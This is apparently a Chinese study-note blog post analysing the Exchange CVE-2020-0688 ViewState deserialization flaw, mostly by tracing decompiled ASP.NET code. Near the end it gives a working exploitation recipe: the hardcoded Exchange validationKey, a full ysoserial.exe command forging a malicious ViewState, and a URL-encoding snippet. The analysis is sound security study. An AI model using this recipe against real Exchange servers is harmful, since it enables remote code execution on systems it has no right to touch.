Exchange CVE-2020-0688代码执行漏洞分析
前言
学习exchange漏洞记录
ViewState 反序列化利用
ViewState概述
ViewState机制是asp.net中对同一个Page的多次请求(PostBack)之间维持Page及控件状态的一种机制。在WebForm中每次请求完,Page对象都会被释放,对同一个Page的多次请求之间的状态信息,如何进行维护呢?WebForm中,每次请求都会存在客户端和服务器之间的一个交互。如果请求完成之后将一些信息传回到客户端,下次请求的时候客户端再将这些状态信息提交给服务器,服务器端对这些信息使用和处理,再将这些信息传回给客户端。这样是不是就可以对同一个Page的多次请求(PostBack)之间维持状态了。对这就是ViewState的基本工作模式。ViewState的设计目的主要就是为了将必要的信息持久化在页面中。这样通过ViewState在页面回传的过程中保存状态值,使原本没有“记忆”的Http协议变得有“记忆”起来。
ViewState 解析流程
ViewState 只是NET中的一个机制,在ASP.NET 在生成和解析ViewState时使用ObjectStateFormatter 进行序列化和反序列化,虽然在序列化后又进行了加密和签名,但是一旦泄露了加密和签名所使用的算法和密钥,我们就可以将ObjectStateFormatter 的反序列化payload 伪装成正常的ViewState,并触发ObjectStateFormatter 的反序列化漏洞。
查看客户端html源代码
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIxMDE4NjY2OWRktaI958qvyTatsn1o2A0eJUnsN04=" />
这是ViewState 在客户端中保存的形式,它保存在一个ID为__VIEWSTATE的Hidden中,它的Value是使用Base64编码后的字符串。这个字符串实际上是一个对象(Pair类型)序列化之后的结果。这个对象保存了整个页面的控件树的ViewState。可以拿解码工具解密看看这串加密的内容。
解析成了一个Pair对象
也就是这串数据则是base64编码后的序列化数据。
在服务器端和ViewState机制密切相关的有三个类Page,Control,StateBag。
Page继承自Control,Control和StateBag是聚合关系,在Control中有一个StateBag的实例ViewState。这三个类互相协作完成ViewState机制的大概过程如下。Page对客户端请求进行处理,在处理的过程中先是将客户端提交的_VIEWSTATE反序列化为对象,调用Control的相关方法给所有的控件装载数据,这些数据是上次请求结束后控件的状态数据。在之后的一些事件中这些状态数据可能被修改。在请求结束之前调用Control的相关方法得到所有控件的被修改过的状态数据,之后Page将其进行序列化,并返回给客户端。在Control中又具体调用StateBag类的方法完成状态数据的加载和保存。
Page生命周期,如图
整一个page会先走到Page.ProcessRequestMain()方法
private void ProcessRequestMain(bool includeStagesBeforeAsyncPoint, bool includeStagesAfterAsyncPoint)
{
try
{
HttpContext context = this.Context;
string text = null;
if (includeStagesBeforeAsyncPoint)
{
if (this.IsInAspCompatMode)
{
AspCompatApplicationStep.OnPageStartSessionObjects();
}
if (this.PageAdapter != null)
{
this._requestValueCollection = this.PageAdapter.DeterminePostBackMode();
}
else
{
this._requestValueCollection = this.DeterminePostBackMode();
}
string text2 = string.Empty;
if (this.DetermineIsExportingWebPart())
{
......//省略代码
this.InitRecursive(null);
if (EtwTrace.IsTraceEnabled(5, 4))
{
EtwTrace.Trace(EtwTraceType.ETW_TYPE_PAGE_INIT_LEAVE, this._context.WorkerRequest);
}
if (context.TraceIsEnabled)
{
this.Trace.Write("aspx.page", "End Init");
}
if (context.TraceIsEnabled)
{
this.Trace.Write("aspx.page", "Begin InitComplete");
}
this.OnInitComplete(EventArgs.Empty);
if (context.TraceIsEnabled)
{
this.Trace.Write("aspx.page", "End InitComplete");
}
if (this.IsPostBack)
{
if (context.TraceIsEnabled)
{
this.Trace.Write("aspx.page", "Begin LoadState");
}
if (EtwTrace.IsTraceEnabled(5, 4))
{
EtwTrace.Trace(EtwTraceType.ETW_TYPE_PAGE_LOAD_VIEWSTATE_ENTER, this._context.WorkerRequest);
}
this.LoadAllState();
if (EtwTrace.IsTraceEnabled(5, 4))
{
EtwTrace.Trace(EtwTraceType.ETW_TYPE_PAGE_LOAD_VIEWSTATE_LEAVE, this._context.WorkerRequest);
}
......//省略代码
this.SaveAllState();
......//省略代码
InitRecursive
初始化阶段调用Control. InitRecursive,它递归对所有的控件进行初始化。随后调用InitRecursive方法
System.Web.UI.Control#InitRecursive ->System.Web.UI.Control#InitRecursive
跟踪代码
判断传参过来的_viewState是否为空,不为空调用,this._viewState.TrackViewState();
TrackViewState方法代码
internal void TrackViewState()
{
this.marked = true;
}
设置值为true。
TrackViewState方法的代码作用就是中打开跟踪ViewState开关。
LoadAllState
Page中继续调用LoadAllState,跟踪查看
LoadAllState只有在PostBack的时候才会执行,即为一个标记,记录是否为第一次加载。
它的主要功能是将从页面传递来的__VIEWSTATE的值反序列化为Pair类型的对象,然后将这个对象中存储的ViewState的值加载到Page及所有控件中。实际上LoadAllState加载了ControlState(控件状态)及ViewState(视图状态)。
即该部分实现反序列化操作。
SaveAllState
SaveAllState它的操作和LoadAllState相反。
将Control.SaveViewStateRecursive生成的对象序列化为一个字符串,并赋值给Page.ClientState属性
最终将ClientState属性中的值写入到HTML页面的_VIEWSTATE中。
该部分实现序列化并且将序列化的内容写到HTML页面中。
反序列化流程分析
跟踪代码LoadAllState
private void LoadAllState()
{
object obj = this.LoadPageStateFromPersistenceMedium();
IDictionary dictionary = null;
Pair pair = null;
Pair pair2 = obj as Pair;
if (obj != null)
{
dictionary = (pair2.First as IDictionary);
pair = (pair2.Second as Pair);
}
...
protected internal virtual object LoadPageStateFromPersistenceMedium()
{
PageStatePersister pageStatePersister = this.PageStatePersister;
try
{
pageStatePersister.Load();
}
catch (HttpException ex)
{
...
}
HiddenFieldPageStatePersister.Load
public override void Load()
{
if (base.Page.RequestValueCollection == null)
{
return;
}
string text = null;
try
{
text = base.Page.RequestViewStateString;
if (!string.IsNullOrEmpty(text) || !string.IsNullOrEmpty(base.Page.ViewStateUserKey))
{
Pair pair = (Pair)Util.DeserializeWithAssert(base.StateFormatter2, text, Purpose.WebForms_HiddenFieldPageStatePersister_ClientState);
base.ViewState = pair.First;
base.ControlState = pair.Second;
}
}
catch (Exception ex)
{
if (ex.InnerException is ViewStateException)
{
throw;
}
ViewStateException.ThrowViewStateError(ex, text);
}
}
Util.DeserializeWithAssert
至此流程走到ObjectStateFormatter.Deserialize()反序列化方法中。
将字符串进行Base64解码为字节流,如果需要解密则进行解密处理,否则需要进行需要Mac则进行Mac处理,将字节流转换为内存流,进行反序列化返回Pair对象
private object Deserialize(string inputString, Purpose purpose)
...
byte[] array = Convert.FromBase64String(inputString);
int num = array.Length;
try
{
if (AspNetCryptoServiceProvider.Instance.IsDefaultProvider && !this._forceLegacyCryptography)
{
if (this._page != null && (this._page.ContainsEncryptedViewState || this._page.EnableViewStateMac))
{
Purpose purpose2 = purpose.AppendSpecificPurposes(this.GetSpecificPurposes());
ICryptoService cryptoService = AspNetCryptoServiceProvider.Instance.GetCryptoService(purpose2, CryptoServiceOptions.None);
byte[] array2 = cryptoService.Unprotect(array);
array = array2;
num = array2.Length;
}
}
else if (this._page != null && this._page.ContainsEncryptedViewState)
{
array = MachineKeySection.EncryptOrDecryptData(false, array, this.GetMacKeyModifier(), 0, num);
num = array.Length;
}
else if ((this._page != null && this._page.EnableViewStateMac) || this._macKeyBytes != null)
{
array = MachineKeySection.GetDecodedData(array, this.GetMacKeyModifier(), 0, num, ref num);
}
}
在Asp.net2.0中实现PageStatePersister这个抽象类,具体提供持久化机制的类是HiddenFieldPageStatePersister。它实现了Load和Save两个方法,Load时将__VIEWSTATE反序列化为一个Pair对象,Save时将Pair对象序列化为一个字符串赋值给Page.ClientState。HiddenFieldPageStatePersister中采用的格式器是ObjectStateFormatter,其实string Serialize(object state),和object Deserialize(string serializedState)这两个方法,从而实现对Pair对象的序列化和反序列化。
以上整一个流程下来就是ProcessRequestMain 中判断是否为PostBack 状态,如果是就获取__VIEWSTATE ,调用LoadAllState 方法进行反序列化操作。
web.config配置ViewState
ViewState 使用ObjectStateFormatter 进行反序列化操作,ViewState 采取了加密和签名的安全措施。但是如果加密密钥泄露,依然可以伪装加密的数据进行攻击。
enableViewState: 用于设置是否开启viewState
enableViewStateMac: 用于设置是否开启ViewState Mac (校验)功能。4.5.2之前,该选项为false,可以禁止Mac校验功能。但是在4.5.2之后,强制开启ViewState Mac 校验功能.
viewStateEncryptionMode: 用于设置是否开启ViewState Encrypt (加密)功能。该选项的值有三种选择:Always、Auto、Never。
- Always表示ViewState始终加密;
- Auto表示 如果控件通过调用 RegisterRequiresViewStateEncryption() 方法请求加密,则视图状态信息将被加密,这是默认值;
- Never表示 即使控件请求了视图状态信息,也永远不会对其进行加密。
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
validationKey 和 decryptionKey 分别是校验和加密所用的密钥,validation和decryption则是校验和加密所使用的算法(可以省略,采用默认算法)。校验算法包括: SHA1、 MD5、 3DES、 AE、 HMACSHA256、 HMACSHA384、 HMACSHA512。加密算法包括:DES、3DES、AES。 由于web.config 保存在服务端上,在不泄露machineKey的情况下,保证了ViewState的安全性。
Exchange 漏洞分析
在exchange ecp路由接口中使用了VIEWSTATE
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIxMDE4NjY2OWRktaI958qvyTatsn1o2A0eJUnsN04=" />
而web.config 中加密的密钥为硬编码
即可使用密钥伪造加密数据进行攻击。
使用yso生成数据
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="aa29629a-fdaf-4268-a3c0-3c9f7bc97703" --isdebug –-islegacy
--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(默认,漏洞产生原因)
--validationalg = SHA1(默认,漏洞产生原因)
--generator=B97B4E27(基本默认)
--viewstateuserkey = ASP.NET_SessionId的值
生成数据后需要url编码
from urllib.parse import quote
input_str ="payload"
quote(input_str,"utf-8")
参考
CVE-2020-0688的武器化与.net反序列化漏洞那些事
cve-2020-0688-Exchange-远程代码执行分析及复现
结尾
此篇幅缺少一些细节如处理流程中的加密步骤等,.net代码能力较差,后面再回来分析细节。